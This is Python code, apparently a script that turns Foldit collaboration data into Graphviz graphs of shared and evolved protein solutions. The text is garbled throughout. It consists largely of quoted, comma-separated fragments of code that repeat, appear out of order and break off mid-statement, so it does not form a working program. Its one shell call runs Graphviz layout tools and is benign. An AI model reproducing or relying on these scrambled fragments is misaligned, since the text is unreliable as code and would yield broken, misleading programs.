groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], 
get_source(e)['header']['score'])), #", "p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in", "= [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid,", "for l in r.lines for p in l.pdb_infos] if r.lines else []) +", "in shared.items(): gid = pdbs[0].gid num_ignored = len([p for p in pdbs if", "evolved = {} # create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda", "else []) + ([p for l in r.evol_target_lines for p in l.pdb_infos] if", "1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d:", "in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared", "List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda", "out anyone who later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid),", "get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in", "num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved])", "assert len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] = c", "get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions']", "user_colors = {} for pid in data.pid.unique(): print(pid) df = data[data.pid == pid]", "uid: str energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps:", "groupby import pandas as pd import numpy as np import matplotlib.pyplot as plt", "or p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x for", "list(uid_source_grouped.keys()) # evolver_clusters = {gid: 
Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) #", "e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start -", "Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids}", "'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in pdbs: if", "for uid, g in # uid_grouped if uid not in active_uids} # screen", "-Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy:", "start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] =", "# edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) / (end", "do it again, this time for people who just loaded in a shared", "evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for", "= {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors)", "energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float]", "p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed',", "[]), key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x", "in 
evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time for people who", "'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p", "s.scoretype == \"1\": return s.uid for i, line in enumerate(lines): sids = [p.sid", "g in uid_grouped} # further group by source evolved_targets = {target for targets", "cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy)", "pdbs[0].gid num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in", "as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{} |", "neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str", "'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for", "+ ([p for l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else", "for p in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source", "if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color", "= {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in", "= sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 +", "'2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids in groups_uids.items():", "= colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) / (end - start),", "List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def", "= remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) == 0", "xs in evolves_by_source.items()} 
collabs[pid] = [] for root in roots: tag = get_tag(root)", "ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype ==", "-> str: if s.scoretype == \"1\": return s.uid for i, line in enumerate(lines):", "* c.weight for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source))", "colors cdict = {} # gids = set([xs[0].gid for xs in shared.values()] +", "# print(collab.tag) # front = [(1, c) for c in collab.children] # while", "lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group by", "in uid_source_grouped.values() for target in targets} roots = sum(([p for p in pdbs", "= {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs)", "= pdbs[0].gid num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not", "e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid not in", ">= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): #", "e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or", "if r.lines else []) + ([p for l in r.evol_target_lines for p in", "* 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or", "= [] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy)", "active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label':", "graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid:", "list) -> str: if s.scoretype == 
\"1\": return s.uid for i, line in", "== {}]), [])) # map gids to colors cdict = {} # gids", "p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp", "def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid']", "str(i) raise ValueError(\"evolver pdb {} not found in any evolver lines for {}\".format(s.sid,", "in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for", "cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command line graphviz", "def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype == \"1\": return s.uid", "os import csv import json import logging from itertools import groupby import pandas", "key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map(", "do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) #", "lambda d: [x for x in d if x.scoretype == '2' and x.pdl[-1]['actions']]),", "evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): #", "get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid,", "in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared = {uid:", "# further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid),", "(get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further", "for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as pool: pool.map(render_collab, args.pids, 
chunksize=1)", "numpy as np import matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures", "for p in line.pdb_infos] if s.sid in sids: return s.uid + \"evol\" +", "for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared solutions", "screen out anyone who later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_", "(get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped", "get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid not in active_uids} #", "= True for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p", "get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for", "l.pdb_infos] if r.lines else []) + ([p for l in r.evol_target_lines for p", "col_to_str(c) groups_uids = {gid: [uid for _, uid in g] for gid, g", "{gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids}", "start) / (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in", "str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source:", "\"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy,", "by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'},", "# graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]},", "int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) #", "= df.timestamps.apply(min).min() end = 
df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in", "c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\"", "x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype", "Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i =", "in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda", "for uid, g in uid_grouped} # further group by source evolved_targets = {target", "concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from", "color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command", "groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group by evolver uid_source_grouped =", "soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team structures for", "from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value", "lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid not", "import numpy as np import matplotlib.pyplot as plt from graphviz import Digraph from", "in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid,", "[])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by", "in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in", "not found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag,", "+ str(i) raise ValueError(\"evolver pdb {} not found in any evolver lines for", "k, g in # groupby(sorted(g, 
key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'],", "-> List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs,", "get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group", "in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color)", "if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for", "def get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or", "0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target),", "in collab.children] # while len(front) > 0: # ntab, cur = front.pop() #", "with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot |", "[x for x in d if int(x.sharing_gid) == 0 and x.scoretype == '2'", "evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) /", "# uid_grouped if uid not in active_uids} # screen out anyone who later", "for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid),", "graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as", "x.uid) for x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0", "'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for", "> 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda", 
"{ uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])),", "uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid:", "p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x for x", "all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score']", "# evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target),", "for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front", "# uid: {k: min(g, key=lambda p: p.energy) for k, g in # groupby(sorted(g,", "fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run(", "{}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple):", "# cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _, uid in g]", "graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid", "shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" #", "from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from", "cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for", "and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid,", "uid_grouped if uid not in active_uids} # screen out anyone who later actively", "for targets in uid_source_grouped.values() for target in targets} roots = sum(([p for p", "l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []), 
key=lambda p:", "key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped}", "list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'],", "in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped}", "# do it again, this time for people who just loaded in a", "return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {} not found in", "(evoling_start - start) / (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for", "len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c", "p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d:", "targets} roots = sum(([p for p in pdbs if p.scoretype == '1' and", "== '1' and get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source =", "in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda", "= {} for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df =", "data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r:", "sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))),", "s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = []", "\"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # do", "p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for 
x in d if int(x.sharing_gid)", "\"evol\" + str(i) raise ValueError(\"evolver pdb {} not found in any evolver lines", "uid, g in uid_grouped} # further group by source evolved_targets = {target for", "d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves", "style=\"dashed\" if min(e.energy for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] =", "uid_source_grouped = { uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e:", "= col_to_str(c) groups_uids = {gid: [uid for _, uid in g] for gid,", "return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1]", "structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p", "e: e.uid), lambda e: e.uid) # uid_source_grouped = { # uid: {k: min(g,", "remove_corrupted(pdb_infos): return [x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data):", "= groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group by evolver uid_source_grouped", "for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for", "{}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for l", "args = parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30)", "= {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda", "* (p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']),", "'2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid", "shared.values()), []) 
evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s:", "pdb {} not found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def", "* 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions']", "p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if", "in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _,", "# group by evolver uid_source_grouped = { uid: {k: list(g) for k, g", "# for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time", "is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid'] ==", "-xC {} | dot | gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname,", "edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) / (end -", "c) for c in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\",", "e.uid) # group by evolver uid_source_grouped = { uid: {k: list(g) for k,", "uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for", "[])) # map gids to colors cdict = {} # gids = set([xs[0].gid", "lambda e: e.uid) # uid_source_grouped = { # uid: {k: min(g, key=lambda p:", "min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight", "pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves,", "gid, uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors =", "= parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as", "evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values():", "i += 1 return cands[i] def 
col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0]", "# # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)})", "Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids else [], {c.name: c.energy", "or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def col_to_str(col): return '#'", "= { uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)),", "in pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs in", "'2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1", "== 0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) # map", "or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p in pdl) def", "d: [(x.gid, x.uid) for x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid)", "lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors =", "p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid,", "c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'},", "uid_grouped} # further group by source evolved_targets = {target for targets in uid_source_grouped.values()", "zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _, uid", "uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) #", "key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g 
in", "# 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in", "colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids)", "gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class", "and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup):", "= {gid: [uid for _, uid in g] for gid, g in groupby(", "root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for", "subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{} | neato -Tpng -n2", "line in enumerate(lines): sids = [p.sid for p in line.pdb_infos] if s.sid in", "active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20')", "else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) #", "command line graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname,", "p.energy) in evolved: shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid)", "a shared solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e:", "target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True", "collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids else [],", "int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs", "source evolved_targets = {target for 
targets in uid_source_grouped.values() for target in targets} roots", "with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled',", "evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid)", "float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag:", "roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid,", "map gids to colors cdict = {} # gids = set([xs[0].gid for xs", "True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this", "if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster)", "if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves =", "r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\",", "d: [x for x in d if int(x.sharing_gid) == 0 and x.scoretype ==", "\"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl,", "int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] ==", "= min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9", "shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) #", "fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp for e", "get_team_structures(data, soln_lookup, child_lookup): collabs = {} for 
pid in data.pid.unique(): logging.debug(\"getting team structures", "uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c)", "in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true',", "{}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:]", "'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label':", "return [x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors", "= user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids", "edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) / (end -", 